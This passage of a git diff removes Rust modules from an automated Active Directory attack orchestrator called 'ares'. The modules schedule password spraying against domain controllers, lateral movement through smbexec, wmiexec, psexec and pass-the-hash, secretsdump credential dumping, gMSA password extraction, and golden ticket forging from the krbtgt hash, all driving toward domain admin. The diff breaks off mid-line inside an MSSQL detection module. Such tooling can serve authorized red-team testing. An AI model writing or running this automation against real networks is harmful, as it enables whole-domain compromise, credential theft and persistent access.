Vec<(String, String)> = { - let state = dispatcher.state.read().await; - if state.has_domain_admin || state.credentials.iter().any(|c| c.is_admin) { - // Already have admin creds or DA — skip common spray - Vec::new() - } else { - state - .domain_controllers - .iter() - .filter(|(domain, _)| { - let key = format!("common:{}", domain.to_lowercase()); - !state.is_processed(DEDUP_PASSWORD_SPRAY, &key) - }) - // Only spray after initial recon (AS-REP) has completed. - // This prevents spraying in the first cycle when Kerberoast - // hasn't had time to collect hashes yet. - .filter(|(domain, _)| { - state.is_processed(DEDUP_ASREP_DOMAINS, domain) - || state.is_processed(DEDUP_ASREP_DOMAINS, &domain.to_lowercase()) - }) - // Only spray after delegation enumeration has dispatched for - // at least one credential in this domain. Spraying before - // delegation can lock out accounts and prevent find_delegation - // from using valid credentials. - .filter(|(domain, _)| { - let prefix = format!("{}:", domain.to_lowercase()); - state.has_processed_prefix(DEDUP_DELEGATION_CREDS, &prefix) - }) - // Skip domains with UNCRACKED Kerberoast hashes — - // offline cracking is safer (no lockout risk) and handles - // complex passwords that spray would never find. - // Once all hashes are cracked (or none exist), spray proceeds - // as a fallback path for accounts without SPNs. - .filter(|(domain, _)| { - let d = domain.to_lowercase(); - !state.hashes.iter().any(|h| { - h.hash_type.to_lowercase().contains("kerberoast") - && h.domain.to_lowercase() == d - && h.cracked_password.is_none() - }) - }) - .map(|(domain, dc_ip)| (domain.clone(), dc_ip.clone())) - .collect() - } - }; - - for (domain, dc_ip) in common_spray_work { - let payload = json!({ - "techniques": ["password_spray", "username_as_password"], - "reason": "low_hanging_fruit", - "target_ip": dc_ip, - "domain": domain, - "use_common_passwords": true, - }); - - // Mark as processed BEFORE submitting to prevent duplicate deferred entries. - // The task will be dispatched or deferred regardless. - let key = format!("common:{}", domain.to_lowercase()); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_PASSWORD_SPRAY, key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_PASSWORD_SPRAY, &key) - .await; - - match dispatcher - .throttled_submit("credential_access", "credential_access", payload, 3) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, domain = %domain, "Common password spray dispatched"); - } - Ok(None) => { - debug!(domain = %domain, "Common password spray deferred"); - } - Err(e) => warn!(err = %e, "Failed to dispatch common password spray"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/credential_expansion.rs b/ares-orchestrator/src/automation/credential_expansion.rs deleted file mode 100644 index ca838b61..00000000 --- a/ares-orchestrator/src/automation/credential_expansion.rs +++ /dev/null @@ -1,410 +0,0 @@ -//! auto_credential_expansion -- test new credentials across discovered hosts. -//! -//! When new credentials arrive, this automation tries lateral movement -//! (smbexec, wmiexec, psexec) against non-owned hosts. It also tries -//! secretsdump on DCs for ALL credentials (not just admin — the credential -//! access agent determines feasibility). - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::debug; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Lateral movement techniques to try, in order of stealth preference. -const LATERAL_TECHNIQUES: &[&str] = &["smbexec", "wmiexec", "psexec"]; - -/// Monitors for new credentials and dispatches lateral movement + secretsdump. -/// Interval: 15s. Enhanced version of the original auto_credential_expansion. -pub async fn auto_credential_expansion( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let mut interval = tokio::time::interval(Duration::from_secs(15)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec = { - let state = dispatcher.state.read().await; - - // Skip if already domain admin - if state.has_domain_admin { - continue; - } - - state - .credentials - .iter() - .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) - // Skip delegation accounts — their auth is reserved for S4U. - .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) - // Skip quarantined credentials — locked out, retry after expiry. - .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) - .filter_map(|cred| { - let dedup = format!( - "{}:{}", - cred.domain.to_lowercase(), - cred.username.to_lowercase() - ); - if state.is_processed(DEDUP_EXPANSION_CREDS, &dedup) { - return None; - } - - // Collect non-owned host IPs in the same domain (or child - // domains). Cross-domain lateral attempts with wrong-domain - // creds generate failed auth that triggers AD lockout. - // Domain is extracted from hostname (e.g., - // dc02.child.contoso.local → child.contoso.local). - // Resolve NetBIOS domain names (e.g. "CHILD") to FQDN - // via the netbios_to_fqdn map before matching. - let cred_dom = { - let raw = cred.domain.to_lowercase(); - if !raw.contains('.') { - state - .netbios_to_fqdn - .get(&raw) - .or_else(|| state.netbios_to_fqdn.get(&cred.domain.to_uppercase())) - .map(|fqdn| fqdn.to_lowercase()) - .unwrap_or(raw) - } else { - raw - } - }; - let targets: Vec = state - .hosts - .iter() - .filter(|h| !h.owned) - .filter(|h| { - // Resolve host domain: prefer hostname FQDN, fall - // back to domain_controllers map for bare-IP hosts. - let host_domain = { - let from_hostname = h - .hostname - .to_lowercase() - .split_once('.') - .map(|x| x.1) - .unwrap_or("") - .to_string(); - if from_hostname.is_empty() { - state - .domain_controllers - .iter() - .find(|(_, ip)| ip.as_str() == h.ip) - .map(|(d, _)| d.to_lowercase()) - .unwrap_or_default() - } else { - from_hostname - } - }; - // Skip unknown-domain hosts — retry next cycle - // after nmap populates hostnames. - !host_domain.is_empty() - && (host_domain == cred_dom - || host_domain.ends_with(&format!(".{cred_dom}")) - || cred_dom.ends_with(&format!(".{host_domain}"))) - }) - .map(|h| h.ip.clone()) - .collect(); - - if targets.is_empty() { - return None; - } - - // Find DCs for this credential's domain (for secretsdump). - // Also include child-domain DCs — parent creds are valid in child domains. - // Reuse resolved cred_dom (already NetBIOS→FQDN resolved). - let cred_domain = cred_dom.clone(); - let dc_ips: Vec = state - .domain_controllers - .iter() - .filter(|(domain, _)| { - let d = domain.to_lowercase(); - d == cred_domain || d.ends_with(&format!(".{cred_domain}")) - }) - .map(|(_, ip)| ip.clone()) - .collect(); - - Some(ExpansionWork { - dedup_key: dedup, - credential: cred.clone(), - targets, - dc_ips, - is_admin: cred.is_admin, - }) - }) - .take(3) // Process max 3 new creds per cycle - .collect() - }; - - for item in work { - let mut any_dispatched = false; - - // 1. Try secretsdump on DCs FIRST — this is the highest-value op - // for a new credential. Must run before lateral movement to avoid - // burning CredentialInflight slots on lower-value tasks. - // Admin creds get priority 2; non-admin get priority 3 (higher - // than lateral at 5) since secretsdump is the fastest path to - // krbtgt → DA → golden ticket. - for dc_ip in &item.dc_ips { - let sd_dedup = format!( - "{}:{}:{}", - dc_ip, - item.credential.domain.to_lowercase(), - item.credential.username.to_lowercase() - ); - let already_dumped = { - let state = dispatcher.state.read().await; - state.is_processed(DEDUP_SECRETSDUMP, &sd_dedup) - }; - - if !already_dumped { - let priority = if item.is_admin { 2 } else { 3 }; - if let Ok(Some(task_id)) = dispatcher - .request_secretsdump(dc_ip, &item.credential, priority) - .await - { - any_dispatched = true; - debug!( - task_id = %task_id, - dc = %dc_ip, - is_admin = item.is_admin, - "Credential secretsdump dispatched" - ); - - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_SECRETSDUMP, sd_dedup.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &sd_dedup) - .await; - } - } - } - - // 2. Try lateral movement on non-DC hosts (up to 5 targets). - // Runs after secretsdump so the high-value op gets credential - // inflight slots first. - let technique = LATERAL_TECHNIQUES[0]; // Start with smbexec - for target_ip in item.targets.iter().take(5) { - if let Ok(Some(task_id)) = dispatcher - .request_lateral(target_ip, &item.credential, technique) - .await - { - any_dispatched = true; - debug!( - task_id = %task_id, - target = %target_ip, - technique = technique, - username = %item.credential.username, - "Credential expansion lateral dispatched" - ); - } - } - - // Only mark as processed if at least one task was actually dispatched. - // If all tasks were throttled/deferred, retry next cycle. - if any_dispatched { - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_EXPANSION_CREDS, item.dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_EXPANSION_CREDS, &item.dedup_key) - .await; - } - } - - // 3. Try hashes for pass-the-hash lateral movement - let hash_work: Vec = { - let state = dispatcher.state.read().await; - - if state.has_domain_admin { - continue; - } - - state - .hashes - .iter() - .filter(|h| { - h.hash_type.to_lowercase() == "ntlm" - && !h.domain.is_empty() - && h.username.to_lowercase() != "krbtgt" - && !h.username.ends_with('$') - }) - .filter_map(|hash| { - let dedup = format!( - "{}:{}:{}", - hash.domain.to_lowercase(), - hash.username.to_lowercase(), - &hash.hash_value[..32.min(hash.hash_value.len())] - ); - if state.is_processed(DEDUP_HASH_LATERAL, &dedup) { - return None; - } - - let targets: Vec = state - .hosts - .iter() - .filter(|h| !h.owned) - .map(|h| h.ip.clone()) - .collect(); - - if targets.is_empty() { - return None; - } - - Some(HashExpansionWork { - dedup_key: dedup, - hash: hash.clone(), - targets, - }) - }) - .take(2) - .collect() - }; - - for item in hash_work { - let mut dc_sd_dispatched = false; - - // Build a credential-like object for pass-the-hash - let pth_cred = ares_core::models::Credential { - id: format!("pth_{}", item.hash.username), - username: item.hash.username.clone(), - password: item.hash.hash_value.clone(), - domain: item.hash.domain.clone(), - source: "hash_pth".to_string(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }; - - for target_ip in item.targets.iter().take(3) { - if let Ok(Some(task_id)) = dispatcher - .request_lateral(target_ip, &pth_cred, "pth_smbclient") - .await - { - debug!( - task_id = %task_id, - target = %target_ip, - username = %item.hash.username, - "Hash-based lateral dispatched" - ); - } - } - - // 4. Hash→secretsdump: try pass-the-hash secretsdump against DCs. - // This is the fastest path from hash → krbtgt → DA. - { - let state = dispatcher.state.read().await; - let dc_ips: Vec = state.domain_controllers.values().cloned().collect(); - drop(state); - - for dc_ip in dc_ips { - let sd_dedup = format!( - "{}:{}:{}", - dc_ip, - item.hash.domain.to_lowercase(), - item.hash.username.to_lowercase() - ); - let already = { - let state = dispatcher.state.read().await; - state.is_processed(DEDUP_SECRETSDUMP, &sd_dedup) - }; - if !already { - if let Ok(Some(task_id)) = - dispatcher.request_secretsdump(&dc_ip, &pth_cred, 2).await - { - dc_sd_dispatched = true; - debug!( - task_id = %task_id, - dc = %dc_ip, - username = %item.hash.username, - "Hash-based secretsdump dispatched" - ); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_SECRETSDUMP, sd_dedup.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &sd_dedup) - .await; - } - } - } - } - - // Only mark as fully processed once DC secretsdump has been dispatched. - // PTH lateral alone is not sufficient — the critical path is hash→DC→krbtgt. - if dc_sd_dispatched { - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_HASH_LATERAL, item.dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_HASH_LATERAL, &item.dedup_key) - .await; - } - } - } -} - -struct ExpansionWork { - dedup_key: String, - credential: ares_core::models::Credential, - targets: Vec, - dc_ips: Vec, - is_admin: bool, -} - -struct HashExpansionWork { - dedup_key: String, - hash: ares_core::models::Hash, - targets: Vec, -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_lateral_techniques_order() { - // smbexec first (stealthiest), then wmiexec, then psexec - assert_eq!(LATERAL_TECHNIQUES[0], "smbexec"); - assert_eq!(LATERAL_TECHNIQUES[1], "wmiexec"); - assert_eq!(LATERAL_TECHNIQUES[2], "psexec"); - } - - #[test] - fn test_lateral_techniques_count() { - assert_eq!(LATERAL_TECHNIQUES.len(), 3); - } - - #[test] - fn test_lateral_techniques_contains() { - assert!(LATERAL_TECHNIQUES.contains(&"smbexec")); - assert!(LATERAL_TECHNIQUES.contains(&"wmiexec")); - assert!(LATERAL_TECHNIQUES.contains(&"psexec")); - assert!(!LATERAL_TECHNIQUES.contains(&"evil-winrm")); - } -} diff --git a/ares-orchestrator/src/automation/delegation.rs b/ares-orchestrator/src/automation/delegation.rs deleted file mode 100644 index 0d70077a..00000000 --- a/ares-orchestrator/src/automation/delegation.rs +++ /dev/null @@ -1,103 +0,0 @@ -//! auto_delegation_enumeration -- find delegation for new creds. - -use std::sync::Arc; -use std::time::Duration; - -use tokio::sync::watch; -use tracing::{debug, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Dispatches delegation enumeration for new credentials. -/// Interval: 30s. Matches Python `_auto_delegation_enumeration`. -pub async fn auto_delegation_enumeration( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let notify = dispatcher.delegation_notify.clone(); - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = notify.notified() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec<(String, String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - state - .credentials - .iter() - // Skip delegation accounts — delegation enum is already done - // with other creds, and using a delegation account's cred - // burns auth budget reserved for S4U. - .filter(|c| !state.is_delegation_account(&c.username)) - .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) - .filter_map(|cred| { - if cred.domain.is_empty() { - return None; - } - let cred_domain = cred.domain.to_lowercase(); - let dedup = format!("{}:{}", cred_domain, cred.username.to_lowercase()); - if state.is_processed(DEDUP_DELEGATION_CREDS, &dedup) { - return None; - } - // Exact match first - let dc_ip = state - .domain_controllers - .get(&cred_domain) - .cloned() - .or_else(|| { - // Child-domain fallback: cred domain is parent, - // DC is registered under child (e.g. cred=contoso.local, - // DC=child.contoso.local) - let suffix = format!(".{cred_domain}"); - state - .domain_controllers - .iter() - .find(|(d, _)| d.ends_with(&suffix)) - .map(|(_, ip)| ip.clone()) - }) - .or_else(|| { - // Parent-domain fallback: cred domain is child, - // DC is registered under parent - state - .domain_controllers - .iter() - .find(|(d, _)| cred_domain.ends_with(&format!(".{d}"))) - .map(|(_, ip)| ip.clone()) - })?; - Some((dedup, cred.domain.clone(), dc_ip, cred.clone())) - }) - .collect() - }; - - for (dedup_key, domain, dc_ip, cred) in work { - match dispatcher - .request_delegation_enum(&domain, &dc_ip, &cred) - .await - { - Ok(Some(task_id)) => { - debug!(task_id = %task_id, domain = %domain, "Delegation enumeration dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_DELEGATION_CREDS, dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_DELEGATION_CREDS, &dedup_key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch delegation enumeration"), - } - } - } -} diff --git a/ares-orchestrator/src/automation/gmsa.rs b/ares-orchestrator/src/automation/gmsa.rs deleted file mode 100644 index 16233556..00000000 --- a/ares-orchestrator/src/automation/gmsa.rs +++ /dev/null @@ -1,145 +0,0 @@ -//! auto_gmsa_extraction -- dump gMSA passwords when gMSA accounts are found. -//! -//! Group Managed Service Accounts (gMSA) store their passwords in Active -//! Directory in the `msDS-ManagedPassword` attribute. Any principal with read -//! access can retrieve the plaintext password. When we discover users whose -//! names end with `$` and whose descriptions mention "managed service account" -//! (or via BloodHound gMSA edges), we dispatch `gmsa_dump_passwords`. - -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Monitors for gMSA accounts and dispatches password extraction. -/// Interval: 30s. -pub async fn auto_gmsa_extraction( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec = { - let state = dispatcher.state.read().await; - - // Need at least one credential to query AD for gMSA passwords - if state.credentials.is_empty() { - continue; - } - - // Find gMSA-like accounts from discovered users - let gmsa_accounts: Vec = state - .users - .iter() - .filter_map(|user| { - // gMSA accounts typically end with $ and have "managed service" - // in description, or their name contains "gmsa" / "msds" - let is_gmsa = user.username.ends_with('$') - && (user.description.to_lowercase().contains("managed service") - || user.username.to_lowercase().contains("gmsa")); - - if !is_gmsa { - return None; - } - - let dedup_key = format!( - "{}:{}", - user.domain.to_lowercase(), - user.username.to_lowercase() - ); - if state.is_processed(DEDUP_GMSA_ACCOUNTS, &dedup_key) { - return None; - } - - // Find a credential we can use to query this domain - let cred = state - .credentials - .iter() - .find(|c| c.domain.to_lowercase() == user.domain.to_lowercase())?; - - let dc_ip = state - .domain_controllers - .get(&user.domain.to_lowercase()) - .cloned()?; - - Some(GmsaWork { - dedup_key, - gmsa_account: user.username.clone(), - domain: user.domain.clone(), - dc_ip, - credential: cred.clone(), - }) - }) - .collect(); - - gmsa_accounts - }; - - for item in work { - let payload = json!({ - "technique": "gmsa_dump_passwords", - "target_ip": item.dc_ip, - "domain": item.domain, - "gmsa_account": item.gmsa_account, - "credential": { - "username": item.credential.username, - "password": item.credential.password, - "domain": item.credential.domain, - }, - }); - - match dispatcher - .throttled_submit("credential_access", "credential_access", payload, 3) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - gmsa_account = %item.gmsa_account, - domain = %item.domain, - "gMSA password dump dispatched" - ); - - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_GMSA_ACCOUNTS, item.dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_GMSA_ACCOUNTS, &item.dedup_key) - .await; - } - Ok(None) => { - debug!(gmsa = %item.gmsa_account, "gMSA task deferred by throttler"); - } - Err(e) => { - warn!(err = %e, gmsa = %item.gmsa_account, "Failed to dispatch gMSA dump") - } - } - } - } -} - -struct GmsaWork { - dedup_key: String, - gmsa_account: String, - domain: String, - dc_ip: String, - credential: ares_core::models::Credential, -} diff --git a/ares-orchestrator/src/automation/golden_ticket.rs b/ares-orchestrator/src/automation/golden_ticket.rs deleted file mode 100644 index 7c57be5d..00000000 --- a/ares-orchestrator/src/automation/golden_ticket.rs +++ /dev/null @@ -1,295 +0,0 @@ -//! auto_golden_ticket -- monitor for krbtgt hash and forge golden ticket. - -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::dispatcher::Dispatcher; - -/// Monitors for krbtgt hash and triggers golden ticket forging. -/// Interval: 30s. Matches Python `_auto_golden_ticket`. -pub async fn auto_golden_ticket(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let state = dispatcher.state.read().await; - - // Skip if already have golden ticket - if state.has_golden_ticket { - continue; - } - - // Skip if no domain admin yet - if !state.has_domain_admin { - continue; - } - - // Look for krbtgt hash - let krbtgt_hash = state - .hashes - .iter() - .find(|h| h.username.to_lowercase() == "krbtgt"); - - let krbtgt = match krbtgt_hash { - Some(h) => h.clone(), - None => continue, - }; - - let domain = if !krbtgt.domain.is_empty() { - krbtgt.domain.clone() - } else { - match state.domains.first() { - Some(d) => d.clone(), - None => continue, - } - }; - - // Domain SID: prefer cached value, resolve via lookupsid if missing. - let mut domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned(); - - // Look up a DC IP for this domain - let dc_ip = state - .domain_controllers - .get(&domain.to_lowercase()) - .cloned(); - - // Find the best credential for the domain: prefer plaintext, fall back to NTLM hash. - let admin_cred = state - .credentials - .iter() - .find(|c| { - c.username.to_lowercase() == "administrator" - && c.domain.to_lowercase() == domain.to_lowercase() - }) - .cloned(); - let admin_hash = state - .hashes - .iter() - .find(|h| { - h.username.to_lowercase() == "administrator" - && h.domain.to_lowercase() == domain.to_lowercase() - && h.hash_type.to_uppercase() == "NTLM" - }) - .cloned(); - - // Collect a password credential for SID lookup (any domain user will do). - // Prefer a cred from the target domain, but fall back to any valid cred - // since NTLM cross-domain auth works for lookupsid via trust relationships. - let lookup_cred = state - .credentials - .iter() - .find(|c| { - c.domain.to_lowercase() == domain.to_lowercase() - && !c.password.is_empty() - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - .or_else(|| { - state.credentials.iter().find(|c| { - !c.password.is_empty() - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - }) - .cloned(); - - drop(state); - - // ── Resolve domain SID if not cached ──────────────────────────── - if domain_sid.is_none() { - if let Some(ref target_ip) = dc_ip { - let result = resolve_domain_sid( - &domain, - target_ip, - lookup_cred.as_ref(), - admin_hash.as_ref(), - ) - .await; - - // Cache the resolved SID and admin name - if let Some((ref sid, ref admin_name)) = result { - info!(domain = %domain, sid = %sid, admin = admin_name.as_deref().unwrap_or("Administrator"), "Domain SID resolved via lookupsid"); - let op_id = { dispatcher.state.read().await.operation_id.clone() }; - let reader = ares_core::state::RedisStateReader::new(op_id); - let mut conn = dispatcher.queue.connection(); - if let Err(e) = reader - .set_domain_sid(&mut conn, &domain.to_lowercase(), sid) - .await - { - warn!(err = %e, "Failed to persist domain SID to Redis"); - } - if let Some(ref name) = admin_name { - if let Err(e) = reader - .set_admin_name(&mut conn, &domain.to_lowercase(), name) - .await - { - warn!(err = %e, "Failed to persist admin name to Redis"); - } - } - let mut state = dispatcher.state.write().await; - state.domain_sids.insert(domain.to_lowercase(), sid.clone()); - if let Some(ref name) = admin_name { - state - .admin_names - .insert(domain.to_lowercase(), name.clone()); - } - } - - domain_sid = result.map(|(sid, _)| sid); - } - } - - let domain_sid = match domain_sid { - Some(sid) => sid, - None => { - warn!(domain = %domain, "Cannot resolve domain SID — skipping golden ticket"); - continue; - } - }; - - // Use cached RID-500 name, defaulting to "Administrator" when unknown. - let admin_username = { - let state = dispatcher.state.read().await; - state - .admin_names - .get(&domain.to_lowercase()) - .cloned() - .unwrap_or_else(|| "Administrator".to_string()) - }; - - // ── Build and submit golden ticket task ───────────────────────── - // Strip LM prefix if hash is in "lm:ntlm" format — ticketer expects - // a single 32-char NTLM hex string, not the LM:NTLM pair. - let ntlm_hash = match krbtgt.hash_value.rsplit_once(':') { - Some((_, ntlm)) if ntlm.len() == 32 => ntlm.to_string(), - _ => krbtgt.hash_value.clone(), - }; - - let mut payload = json!({ - "technique": "golden_ticket", - "vuln_type": "golden_ticket", - "domain": domain, - "krbtgt_hash": ntlm_hash, - "username": admin_username, - "domain_sid": domain_sid, - }); - if let Some(ip) = dc_ip { - payload["dc_ip"] = json!(ip); - } - if let Some(ref cred) = admin_cred { - payload["admin_password"] = json!(cred.password); - payload["admin_domain"] = json!(cred.domain); - } - if let Some(ref hash) = admin_hash { - payload["admin_hash"] = json!(hash.hash_value); - payload["admin_domain"] = - json!(admin_cred.as_ref().map_or(&hash.domain, |c| &c.domain)); - } - if let Some(ref aes) = krbtgt.aes_key { - payload["aes_key"] = json!(aes); - } - - match dispatcher - .throttled_submit("exploit", "privesc", payload, 1) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, domain = %domain, "Golden ticket task dispatched"); - // Mark has_golden_ticket immediately to prevent re-dispatch. - // The result processing will also confirm on task completion - // (detects "Saving ticket in *.ccache" in tool output). - if let Err(e) = dispatcher - .state - .set_golden_ticket(&dispatcher.queue, &domain) - .await - { - warn!(err = %e, "Failed to set golden ticket flag after dispatch"); - } - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch golden ticket"), - } - } -} - -/// Resolve domain SID and RID-500 account name by calling `impacket-lookupsid`. -/// Returns `(domain_sid, Option)`. Tries password credential first, -/// then NTLM hash. -/// -/// Uses the credential's own domain for NTLM auth (not the target domain) so -/// cross-domain trust authentication works — e.g. a `child.contoso.local` -/// cred can resolve the SID of `contoso.local` via its parent DC. -async fn resolve_domain_sid( - _domain: &str, - dc_ip: &str, - password_cred: Option<&ares_core::models::Credential>, - admin_hash: Option<&ares_core::models::Hash>, -) -> Option<(String, Option)> { - // Try password auth first — use the credential's native domain for auth - if let Some(cred) = password_cred { - let auth_domain = if cred.domain.is_empty() { - _domain - } else { - &cred.domain - }; - let args = json!({ - "domain": auth_domain, - "username": cred.username, - "password": cred.password, - "dc_ip": dc_ip, - }); - match ares_tools::privesc::get_sid(&args).await { - Ok(output) => { - let text = output.combined_raw(); - if let Some(sid) = ares_core::parsing::extract_domain_sid(&text) { - let admin_name = ares_core::parsing::extract_rid500_name(&text); - return Some((sid, admin_name)); - } - warn!(auth_domain = %auth_domain, user = %cred.username, "lookupsid succeeded but no SID pattern found in output"); - } - Err(e) => { - warn!(err = %e, user = %cred.username, auth_domain = %auth_domain, "lookupsid with password failed"); - } - } - } - - // Fall back to hash auth — use the hash's native domain for auth - if let Some(hash) = admin_hash { - let auth_domain = if hash.domain.is_empty() { - _domain - } else { - &hash.domain - }; - let args = json!({ - "domain": auth_domain, - "username": "Administrator", - "hash": hash.hash_value, - "dc_ip": dc_ip, - }); - match ares_tools::privesc::get_sid(&args).await { - Ok(output) => { - let text = output.combined_raw(); - if let Some(sid) = ares_core::parsing::extract_domain_sid(&text) { - let admin_name = ares_core::parsing::extract_rid500_name(&text); - return Some((sid, admin_name)); - } - warn!(auth_domain = %auth_domain, "lookupsid (hash) succeeded but no SID pattern found"); - } - Err(e) => { - warn!(err = %e, auth_domain = %auth_domain, "lookupsid with admin hash failed"); - } - } - } - - None -} diff --git a/ares-orchestrator/src/automation/mod.rs b/ares-orchestrator/src/automation/mod.rs deleted file mode 100644 index 3768130b..00000000 --- a/ares-orchestrator/src/automation/mod.rs +++ /dev/null @@ -1,64 +0,0 @@ -//! Background automation tasks. -//! -//! Each `auto_*` function is a long-running tokio task that periodically checks -//! the shared state and dispatches new tasks when conditions are met. All follow -//! the same pattern: -//! -//! 1. Sleep for an interval (configurable) -//! 2. Take a read lock, collect new work items -//! 3. Release lock, submit tasks via the dispatcher -//! 4. Mark items as processed (write lock + Redis persist) -//! -//! This mirrors the Python `_orchestrator.py` background tasks but eliminates -//! all threading hacks since tokio tasks are truly concurrent. - -mod acl; -mod adcs; -mod bloodhound; -mod coercion; -mod crack; -mod credential_access; -mod credential_expansion; -mod delegation; -mod gmsa; -mod golden_ticket; -mod mssql; -mod refresh; -mod s4u; -mod secretsdump; -mod share_enum; -mod shares; -mod stall_detection; -mod trust; -mod unconstrained; - -// Re-export all public task functions at the same paths they had before the split. -pub use acl::auto_acl_chain_follow; -pub use adcs::auto_adcs_enumeration; -pub use bloodhound::auto_bloodhound; -pub use coercion::auto_coercion; -pub use crack::auto_crack_dispatch; -pub use credential_access::auto_credential_access; -pub use credential_expansion::auto_credential_expansion; -pub use delegation::auto_delegation_enumeration; -pub use gmsa::auto_gmsa_extraction; -pub use golden_ticket::auto_golden_ticket; -pub use mssql::auto_mssql_detection; -pub use refresh::state_refresh; -pub use s4u::auto_s4u_exploitation; -pub use secretsdump::auto_local_admin_secretsdump; -pub use share_enum::auto_share_enumeration; -pub use shares::auto_share_spider; -pub use stall_detection::auto_stall_detection; -pub use trust::auto_trust_follow; -pub use unconstrained::auto_unconstrained_exploitation; - -pub(crate) fn crack_dedup_key(hash: &ares_core::models::Hash) -> String { - let prefix = &hash.hash_value[..32.min(hash.hash_value.len())]; - format!( - "{}:{}:{}", - hash.domain.to_lowercase(), - hash.username.to_lowercase(), - prefix - ) -} diff --git a/ares-orchestrator/src/automation/mssql.rs b/ares-orchestrator/src/automation/mssql.rs deleted file mode 100644 index 8477b6e4..00000000 --- a/ares-orchestrator/src/automation/mssql.rs +++ /dev/null @@ -1,94 +0,0 @@ -//! auto_mssql_detection -- detect MSSQL services on hosts. - -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::dispatcher::Dispatcher; - -/// Scans hosts for MSSQL services (port 1433) and queues exploitation vulns. -/// Interval: 30s. Matches Python `_auto_mssql_detection`. -pub async fn auto_mssql_detection( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec<(String, String)> = { - let state = dispatcher.state.read().await; - state - .hosts - .iter() - .filter(|h| { - h.services - .iter() - .any(|s| s.contains("1433") || s.to_lowercase().contains("mssql")) - }) - .filter(|h| !state.mssql_enum_dispatched.contains(&h.ip)) - .map(|h| (h.ip.clone(), h.hostname.clone())) - .collect() - }; - - for (ip, hostname) in work { - let vuln = ares_core::models::VulnerabilityInfo { - vuln_id: format!("mssql_{}", ip.replace('.', "_")), - vuln_type: "mssql_access".to_string(), - target: ip.clone(), - discovered_by: "auto_mssql_detection".to_string(), - discovered_at: chrono::Utc::now(), - details: { - let mut d = std::collections::HashMap::new(); - d.insert("target_ip".to_string(), json!(ip)); - if !hostname.is_empty() { - d.insert("hostname".to_string(), json!(hostname)); - // Extract domain from FQDN: "sql01.fabrikam.local" → "fabrikam.local" - if let Some(dot_pos) = hostname.find('.') { - let domain = &hostname[dot_pos + 1..]; - if !domain.is_empty() { - d.insert("domain".to_string(), json!(domain)); - } - } - } - d - }, - recommended_agent: "lateral".to_string(), - priority: 4, - }; - - match dispatcher - .state - .publish_vulnerability(&dispatcher.queue, vuln) - .await - { - Ok(true) => { - info!(ip = %ip, "MSSQL service detected — vulnerability queued"); - dispatcher - .state - .write() - .await - .mssql_enum_dispatched - 